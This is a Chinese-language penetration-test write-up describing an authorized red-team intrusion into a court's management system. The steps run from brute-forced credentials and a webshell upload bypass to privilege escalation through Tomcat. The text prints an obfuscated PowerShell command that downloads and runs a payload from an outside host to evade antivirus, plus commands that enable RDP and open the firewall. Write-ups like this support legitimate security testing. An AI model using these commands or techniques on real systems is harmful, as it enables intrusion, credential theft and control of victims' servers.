RT對某法院授權滲透測試

目標站點是某法院的科技法庭管理系統

在登錄的時候發現存在用戶名遍歷漏洞

用burp的username字典爆破除了存在的用戶名 再根據自用的字典成功爆破出了后臺用戶

所以說打紅隊的時候弱口令是YYDS

第二部進入后臺找上傳點，進入用戶特有的法院助手系統

沒有出現圖片上傳點，但有doc文檔上傳點

開始的目標重心是關注后綴是否可控，大小寫繞過，%00繞過均沒有成功響應，直接亂輸一個后綴名，發現依然沒有回應。莫非是白名單過濾？正常的doc是能夠返回路徑的，訪問url直接下載文件。

在上面圖片的中template找到了突破口，我發現更改template (模板)的值后，文件的回顯目錄發生了變化，猜測該系統是根據文件類型來定義上傳保存目錄，doc是默認保存在靜態目錄下的，于是將改成asp后綴，在對應在文件名修改成asp，成功回顯目錄，拿下webshell

然而覺得一切開始好起來的時候，在上線CS的時候遇到不少問題，因為目標IIS服務器上是部署了火絨的

開始我想直接web投遞一句話，發現拒絕訪問，應該是被攔截。然后用內存加載shell的方式，上傳了加載器和shellcode進行上線，也沒有成功，感覺是環境問題，或者火絨直接不準腳本運行？因為我的加載器免殺Win10 360 火絨雙開都是能過的。

既然說不允許訪問powershell，考慮應該是權限問題，于是將重心放在了提權上面，之前的思路是上線CS方便橫向滲透，順便跑一波提權腳本，但是現在這條路應該走不下去了，低權限的webshell，還有火絨攔截，應該比較麻煩，這里拋磚引玉，希望大佬有更好的解決辦法。

我是直接陷入了困境，開始訪問目標機器上的一些配置文件，比如其他旁站，比如sql的賬號密碼之類的，結果我意外的發現了tomcat/webapp/doc，這不是tomcat嗎？

為了驗證目標機器搭載了tomcat服務，我訪問了對應web，發現確實存在，喜出望外，在webapp下寫入了jsp木馬，成功拿下管理員權限，為了進一步dumphash，開3389，用unicode加密的powershell繞過了火絨成功上線。

powshell代碼參考以下

cmd /c echo set-alias -name xz -value IEX;x^z (New-Object "NeT.WeBClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://1’+'1.111.11.1:80'+'/a') | p^o^w^e^r^s^h^e^l^l 

需要提權在cs的web投遞做好設置。

之后用mimikatz和CS的hashdump導出了管理員密碼，執行命令關閉防火墻，成功連接3389。

啟動3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

加防火墻規則

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=338

遠程之后把火絨關了，之后的路就好走多了 上傳fscan進行內網大保健

跑了一堆打印機和未授權弱口令等等

不過多說明

因為該服務器沒有其他網卡的機器，也不能通過內網web和ftp等方式進一步拿下同網段其他IP， 所以就把這些攻擊結果截圖提交了

最后我發現，其實之前不一定非得上線CS，因為蟻劍的后滲透框架也是非常強大的，可以直接通過他的反彈shell模塊成功上線到MSF

而且不會報毒，火絨是沒有攔截的

但是至于提權，肯定是沒有tomcat提權舒服的 也可以通過MSF拿下webshell之后代理然后去穿內網。也是一種思路吧。